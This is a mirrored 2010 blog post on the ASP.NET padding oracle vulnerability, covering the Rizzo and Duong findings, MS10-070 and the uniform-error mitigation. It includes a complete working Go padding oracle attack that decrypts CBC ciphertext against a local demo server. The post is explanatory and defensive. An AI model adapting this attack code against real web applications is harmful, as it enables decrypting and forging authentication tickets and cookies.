This is a mirror of official site: http://jasper-net.blogspot.com/

Vulnerability In .NET AES Implementation Puts ASP.NET Web Sites at Risk

Tuesday, September 14, 2010
ASP.NET web applications that use Forms Authentication, ASP.NET Membership Providers, ASP.NET Role Providers, and/or ViewState encryption are vulnerable to disclosure of the encrypted data and potentially to tampering with it. Details are to be given this Friday, Sept. 17th, at the ‘ekoparty Security Conference’ in Buenos Aires.

'Padding Oracle' Crypto Attack Affects Millions of ASP.NET Applications
"It's worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It's just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes," Duong said.

Padding oracles everywhere
“The second part presents a previously unknown advanced attack. The most significant new discovery is a universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!”
Presented by Rizzo and Duong

This technique lets an attacker decrypt, and potentially forge, the data that ASP.NET features encrypt and store on the web client (ViewState, forms-authentication tickets, cookies) without ever learning the machine key: all the attacker needs is for the server to reveal, request by request, whether a submitted ciphertext decrypted to valid padding.

The flaw is not in the AES algorithm itself but in how ASP.NET handles CBC-mode padding errors: a request whose ciphertext decrypts to invalid padding is answered differently from one that decrypts cleanly, and that difference is the oracle. The presentation details have not yet been given, but one thing is already clear: switching the machine key from AES to 3DES does not help, because the attack does not care which block cipher sits underneath CBC. The mitigation is to remove the oracle, i.e. return one identical error response (same page, same status code, no observable timing difference) for every failed request, and to apply Microsoft's fix (MS10-070) as soon as it is available.
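The mechanism, as an added example in Go that is not part of the original post or of Rizzo and Duong's tool: a stand-in `server` that owns the key, encrypts with CBC and answers exactly one question per request (did the padding check out?), and an attacker that recovers the plaintext from that single bit per query. The keys, the message and the `server` type are constructed for the demo; the same attack code runs unchanged against AES-128 and 3DES, which is why changing the cipher is not a fix.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/des"
	"crypto/rand"
	"errors"
	"fmt"
)

// server stands in for the web application: it owns the key and handles IV || C1 || ... || Cn.
type server struct{ block cipher.Block }

func (s server) encrypt(plaintext []byte) []byte {
	bs := s.block.BlockSize()
	n := bs - len(plaintext)%bs // PKCS#7: n bytes of value n, 1 <= n <= bs
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, bs+len(padded))
	rand.Read(out[:bs]) // random IV in front
	cipher.NewCBCEncrypter(s.block, out[:bs]).CryptBlocks(out[bs:], padded)
	return out
}

// paddingValid is the oracle: one bit per query, never the key or the plaintext.
func (s server) paddingValid(ct []byte) bool {
	bs := s.block.BlockSize()
	if len(ct) < 2*bs || len(ct)%bs != 0 {
		return false
	}
	pt := make([]byte, len(ct)-bs)
	cipher.NewCBCDecrypter(s.block, ct[:bs]).CryptBlocks(pt, ct[bs:])
	n := int(pt[len(pt)-1])
	return n > 0 && n <= bs && bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n))
}

// attackBlock recovers one plaintext block, P = D_k(target) XOR prev, without the key, by forging
// the block in front of target so the decryption ends in valid padding (01, then 02 02, ...).
func attackBlock(oracle func([]byte) bool, prev, target []byte) []byte {
	bs := len(target)
	inter, forged := make([]byte, bs), make([]byte, bs) // D_k(target); attacker's fake previous block
	query := func() bool { return oracle(append(append([]byte{}, forged...), target...)) }
	// On the last byte a hit may be a longer padding (02 02, ...) lining up by chance: disturb byte bs-2.
	confirm := func(pos int) bool {
		forged[bs-2] ^= 0xff
		defer func() { forged[bs-2] ^= 0xff }()
		return pos < bs-1 || query()
	}
	for pos := bs - 1; pos >= 0; pos-- {
		pad := byte(bs - pos)
		for j := pos + 1; j < bs; j++ {
			forged[j] = inter[j] ^ pad // bytes already recovered now decrypt to pad
		}
		g := 0
		for ; g < 256; g++ {
			forged[pos] = byte(g)
			if query() && confirm(pos) {
				inter[pos] = byte(g) ^ pad
				break
			}
		}
		if g == 256 {
			return nil // no query distinguished valid from invalid: the oracle is closed
		}
	}
	for i := range inter {
		inter[i] ^= prev[i] // P = D_k(target) XOR previous ciphertext block
	}
	return inter
}

// paddingOracleDecrypt recovers a whole IV||C1..Cn message from the oracle alone.
func paddingOracleDecrypt(oracle func([]byte) bool, ct []byte, bs int) ([]byte, error) {
	var out []byte
	for i := bs; i+bs <= len(ct); i += bs {
		p := attackBlock(oracle, ct[i-bs:i], ct[i:i+bs])
		if p == nil {
			return nil, errors.New("oracle gave no usable answer")
		}
		out = append(out, p...)
	}
	if len(out) == 0 || int(out[len(out)-1]) == 0 || int(out[len(out)-1]) > len(out) {
		return out, errors.New("recovered data is not PKCS#7 padded")
	}
	return out[:len(out)-int(out[len(out)-1])], nil // strip the recovered padding
}

func main() {
	// Constructed demo keys and message, not taken from any real application.
	aesBlock, _ := aes.NewCipher([]byte("0123456789abcdef"))
	desBlock, _ := des.NewTripleDESCipher([]byte("0123456789abcdef01234567"))
	msg := []byte("user=admin&role=Administrator") // stands in for a forms-auth ticket
	for name, b := range map[string]cipher.Block{"AES-128": aesBlock, "3DES": desBlock} {
		s := server{b}
		pt, err := paddingOracleDecrypt(s.paddingValid, s.encrypt(msg), b.BlockSize())
		fmt.Printf("%-7s recovered %q (err=%v)\n", name, pt, err)
	}
}
```

Run it with `go run`. Each byte costs about 128 oracle queries on average, so a 48-byte ticket falls in a few thousand requests, which is what turns "30 minutes" into a realistic figure for a web application. Note that the attacker code never touches `s.block`: the only thing that stops it is making `paddingValid` unobservable, i.e. answering every malformed request identically in status, body and timing, which is exactly what a single custom error page for all failures does.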

Read more: Security through absurdity
